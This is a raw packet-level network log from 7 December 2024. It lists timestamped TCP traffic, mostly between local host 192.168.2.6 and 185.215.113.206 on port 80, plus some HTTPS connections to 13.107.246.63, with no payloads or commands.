Dec 7, 2024 10:51:47.353271961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.354513884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.354635954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.354681969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.354768991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.355957985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.356093884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.356149912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.356215000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.357515097 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.357609987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.357634068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.357656002 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.358870983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.358928919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.358979940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.359189034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.360272884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.360326052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.360419035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.360481024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.361663103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.361741066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.361780882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.361835003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.363080025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.363132954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.363234997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.363285065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.364470959 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.364492893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.364561081 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.364943027 CET	443	49816	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.365027905 CET	443	49816	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.365107059 CET	49816	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.365330935 CET	49816	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.365350008 CET	443	49816	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.365351915 CET	49816	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.365358114 CET	443	49816	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.365782022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.365842104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.365906954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.366009951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.367151976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.367171049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.367254972 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.368484974 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.368601084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.368680954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.369813919 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.369867086 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.369879007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.369921923 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.370686054 CET	49823	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.370733023 CET	443	49823	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.370912075 CET	49823	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.371176004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.371275902 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.371325016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.371373892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.371628046 CET	49823	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.371639967 CET	443	49823	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.372469902 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.372524023 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.372646093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.372711897 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.373768091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.373826981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.373861074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.374058008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.375092030 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.375149965 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.375216961 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.376326084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.376393080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.376418114 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.376427889 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.377594948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.377667904 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.377707958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.377818108 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.378918886 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.378983974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.379024029 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.379070044 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.380140066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.380187035 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.380249023 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.381458044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.381515026 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.381550074 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.381625891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.382726908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.382791042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.382858992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.382956982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.383883953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.384010077 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.384030104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.384085894 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.385096073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.385251999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.385284901 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.385308027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.386339903 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.386429071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.386506081 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.387571096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.387644053 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.387660027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.387686014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.388776064 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.388847113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.388916016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.388967037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.390011072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.390084028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.390105963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.390140057 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.391242027 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.391325951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.391355991 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.391463041 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.392436028 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.392560005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.392592907 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.392622948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.393639088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.393704891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.393749952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.393810034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.394902945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.394964933 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.394978046 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.395023108 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.396158934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.396234989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.396267891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.396317959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.397294998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.397341013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.397361994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.397382021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.398513079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.398581982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.398619890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.398663998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.399802923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.399867058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.399871111 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.399909973 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.400949001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.401010990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.401036024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.401099920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.402142048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.402236938 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.402240992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.402286053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.403372049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.403430939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.403517962 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.403609991 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.404606104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.404686928 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.404714108 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.404758930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.405833960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.405879021 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.405894995 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.405920029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.407017946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.407114983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.407202959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.408251047 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.408315897 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.408330917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.408628941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.409445047 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.409504890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.409627914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.409936905 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.410689116 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.410753012 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.410887003 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.410937071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.411875010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.411942959 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.411978960 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.412025928 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.413094044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.413165092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.413212061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.413260937 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.414305925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.414369106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.414397955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.414441109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.415551901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.415610075 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.415637970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.415751934 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.416716099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.416776896 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.462294102 CET	443	49819	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.462373972 CET	443	49819	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.462430954 CET	443	49818	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.462455988 CET	49819	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.462497950 CET	443	49818	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.462538004 CET	49818	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.462769032 CET	49818	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.462790966 CET	443	49818	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.462795973 CET	49819	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.462816000 CET	49818	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.462821007 CET	443	49819	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.462822914 CET	443	49818	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.462833881 CET	49819	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.462841988 CET	443	49819	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.465960979 CET	443	49817	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.466036081 CET	443	49817	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.466083050 CET	49817	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.467279911 CET	49824	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.467336893 CET	443	49824	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.467408895 CET	49824	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.467411041 CET	49825	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.467443943 CET	443	49825	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.467488050 CET	49825	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.467756033 CET	49817	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.467763901 CET	443	49817	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.467772961 CET	49817	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.467778921 CET	443	49817	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.468024969 CET	49824	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.468049049 CET	443	49824	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.468204975 CET	49825	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.468219995 CET	443	49825	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.471051931 CET	49826	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.471092939 CET	443	49826	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.471165895 CET	49826	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.471337080 CET	49826	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.471353054 CET	443	49826	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.474251986 CET	443	49820	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.474338055 CET	443	49820	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.474535942 CET	49820	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.474574089 CET	49820	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.474596024 CET	443	49820	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.474607944 CET	49820	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.474612951 CET	443	49820	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.477075100 CET	49827	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.477117062 CET	443	49827	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.477184057 CET	49827	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.477374077 CET	49827	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:47.477400064 CET	443	49827	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:47.541731119 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.541753054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.541850090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.542013884 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.542071104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.542149067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.542233944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.542988062 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.543071985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.543085098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.543205976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.543996096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.544050932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.544063091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.544110060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.545013905 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.545130014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.545262098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.545312881 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.546014071 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.546067953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.546171904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.546217918 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.546972990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.547024965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.547045946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.547086954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.547910929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.547965050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.548047066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.548095942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.548947096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.548995018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.549045086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.549086094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.549926996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.550012112 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.550082922 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.550919056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.550980091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.551012039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.551100969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.551868916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.551908016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.551924944 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.551958084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.552891970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.552941084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.552989960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.553865910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.553915977 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.553956032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.553992987 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.554879904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.554935932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.555003881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.555053949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.555860043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.555963039 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.556015968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.556015968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.556885004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.556958914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.557073116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.557825089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.557883978 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.557945967 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.558012009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.558778048 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.558834076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.558855057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.558895111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.559820890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.559885025 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.559915066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.559951067 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.560797930 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.560843945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.560883045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.561126947 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.561805010 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.561863899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.561887026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.561925888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.562793016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.562874079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.562892914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.562948942 CET	49808	80	192.168.2.6	185.215.113.206
